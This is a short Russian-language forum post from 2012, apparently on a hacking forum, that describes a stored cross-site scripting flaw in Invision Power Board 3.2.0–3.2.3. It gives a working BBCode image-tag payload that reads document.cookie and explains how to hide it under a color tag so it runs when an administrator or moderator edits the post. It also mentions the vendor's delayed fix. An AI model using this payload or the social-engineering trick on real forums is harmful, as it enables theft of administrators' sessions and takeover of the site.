Показать сообщение отдельно

  #56  
Старый 02.06.2012, 14:16
Dart Raiden
Новичок
Регистрация: 12.03.2012
Сообщений: 1
Провел на форуме:
269

Репутация: 0
По умолчанию

Invision Power Board 3.2.0 - 3.2.3. Cross Site Scripting

Добавляем в свое сообщение

Код:
[img]src="123" onError="alert(document.cookie);"[/img]
+ немного соц.инженерии: размещаем пост с таким содержанием, чтобы администратор/модератор его отредактировал, добавляем в конце ядовитый код, маскируем его тэгом [color]. При попытке редактирования происходит выполнение.

фикс выпущен 9 марта (аж через 2 месяца после сообщения разработчикам об уязвимости)
 
Ответить с цитированием